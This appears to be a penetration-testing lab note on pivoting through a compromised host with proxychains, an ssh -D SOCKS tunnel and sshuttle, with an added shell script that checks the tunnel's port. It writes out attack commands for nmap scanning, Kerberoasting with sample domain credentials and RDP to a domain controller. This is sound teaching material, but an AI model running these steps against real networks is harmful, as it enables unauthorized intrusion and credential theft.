Pivoting
Uploaded by arthurquamena

Overview
Pivoting means using a machine we have already compromised as a stepping stone into
another network, one that was not reachable from our position before.
Let's say we compromise a machine with the IP 162.168.2.15, but when we list its
interfaces we notice it also has the IP 162.168.10.2, which means the machine sits on a
second network.
What we can do here is set up a proxy through the compromised machine and use it to
pivot into that network.
There are several tools that can help us with this.

Lab
Proxy Chain
So, for Proxy Chains, the first thing we have to do is open the configuration file:

$ cat /etc/proxychains4.conf

At the very end, in the [ProxyList] section, it shows a proxy type, an IP and a port
number (127.0.0.1 and 9050 in the default file); this is the local port our SSH tunnel
has to bind to.
Points to note: you can always update the port number, for instance once you have a pivot
and want to establish a second one, or if your tunnel breaks, you can just edit it.

To start the pivot, we use this command:

$ ssh -f -N -D 9050 -i pivot root@10.0.155.5

Let's break it down:

ssh : This is the command-line utility for securely connecting to a remote server or
computer. It's widely used for logging into and executing commands on a remote
machine.
-f : This flag tells SSH to go into the background just before it executes the command.
It's often used when you want to run SSH in the background without having it take over
your terminal.
-N : This flag tells SSH not to execute any remote commands. It's used when all you
want to do is set up port forwarding, without running any commands on the remote
server.
-D 9050 : This specifies dynamic port forwarding. It tells SSH to listen on port 9050 on
the local machine and forward all traffic sent to that port through the SSH connection to
the remote server. This effectively sets up a SOCKS proxy on port 9050 , the port the
proxychains configuration points at.
-i pivot : This specifies the identity (private key) file to use for authentication. In this
case, it's using a private key file named pivot to authenticate with the remote server.
This is typically used instead of password authentication for better security.
root@10.0.155.5 : This is the username ( root ) and hostname ( 10.0.155.5 ) of the
remote server you're connecting to. It's the server where the SSH tunnel will terminate.
Here, root is the username, and 10.0.155.5 is the IP address of the server.
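The two checks the notes rely on, that the port at the end of the proxychains config is known (and can be changed when a tunnel breaks) and that an ssh -D listener is actually bound to it before running anything through proxychains, as an added POSIX shell example that is not part of the original notes. It assumes a single-proxy chain as in the notes, that ss or netstat is installed, and uses a constructed sample config rather than the real /etc/proxychains4.conf:

```shell
#!/bin/sh
# Added example, not from the original notes: parse the [ProxyList] section of a
# proxychains4.conf, change its port when a pivot needs a new one, and confirm an
# ssh -D listener is bound before trusting that traffic goes through the tunnel.
# Assumes a single-proxy chain as in the notes; the sample config is constructed.
# Print the active "type host port" entry from the [ProxyList] section.
last_proxy_entry() {
    awk '
        /^\[ProxyList\]/ { inlist = 1; next }
        /^\[/            { inlist = 0 }
        inlist && !/^[[:space:]]*#/ && NF >= 3 { entry = $1 " " $2 " " $3 }
        END { print entry }
    ' "$1"
}
# Rewrite the port of every [ProxyList] entry (e.g. after the old tunnel broke).
set_proxy_port() {
    awk -v newport="$2" '
        /^\[ProxyList\]/ { inlist = 1 }
        inlist && !/^[[:space:]]*#/ && NF >= 3 { $3 = newport }
        { print }
    ' "$1" > "$1.tmp" && mv "$1.tmp" "$1"
}
# Exit 0 if a TCP listener is bound to local port $1 (what ssh -D creates).
# Uses ss from iproute2, or netstat where ss is missing (one of them is assumed).
socks_port_listening() {
    if command -v ss >/dev/null 2>&1; then lister="ss -ltn"; else lister="netstat -ltn"; fi
    $lister 2>/dev/null | awk -v p=":$1\$" '$4 ~ p { found = 1 } END { exit !found }'
}
# Constructed config laid out like the default file: settings first, [ProxyList] last.
write_sample_conf() {
    cat > "$1" <<'EOF'
strict_chain
proxy_dns
[ProxyList]
# add proxy here ...
socks4  127.0.0.1 9050
EOF
}
conf=$(mktemp)
write_sample_conf "$conf"
entry=$(last_proxy_entry "$conf")
port=${entry##* }
echo "proxychains exit proxy: $entry"
if socks_port_listening "$port"; then
    echo "port $port is bound locally; proxychains commands will use the tunnel"
else
    echo "nothing listening on $port; start it with: ssh -f -N -D $port -i <key> user@pivot"
fi
rm -f "$conf"
```

Point last_proxy_entry at /etc/proxychains4.conf to check the real file; set_proxy_port needs write access to it.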

Once the SSH tunnel is up you can run all sorts of tools through proxy chains:

$ proxychains nmap -p88 10.10.10.225 - This scans Kerberos port 88 on the DC
$ proxychains nmap 10.10.10.225 - This scans the 1000 most common ports
$ proxychains nmap 10.10.10.225 -sT - Runs a TCP connect scan instead of a SYN
scan; proxychains only relays connections made through the socket API, so raw-packet SYN
scans and ICMP pings never enter the tunnel
$ proxychains GetUserSPNs.py MARVEL.local/fcastle:Password1 -dc-ip
10.10.10.225 -request - This is a classic Kerberos attack (Kerberoasting) through proxy
chains
$ proxychains xfreerdp /u:administrator /p:'Hacker321!' /v:10.10.10.225 -
We can use this to RDP into the domain controller! Amazing!
$ proxychains firefox - You can start Firefox through proxy chains too! Amazing!

Sshuttle
We can install this tool with:

$ sudo pip install sshuttle

After installation we can start it with:

$ sshuttle -r root@10.10.155.5 10.10.10.0/24 --ssh-cmd "ssh -i pivot"

Once it is connected, sshuttle routes any traffic to 10.10.10.0/24 through the SSH
connection transparently, so we can run commands against that network directly without
prefixing them with proxychains (sshuttle needs local root to add the firewall rules, so it
prompts for sudo).
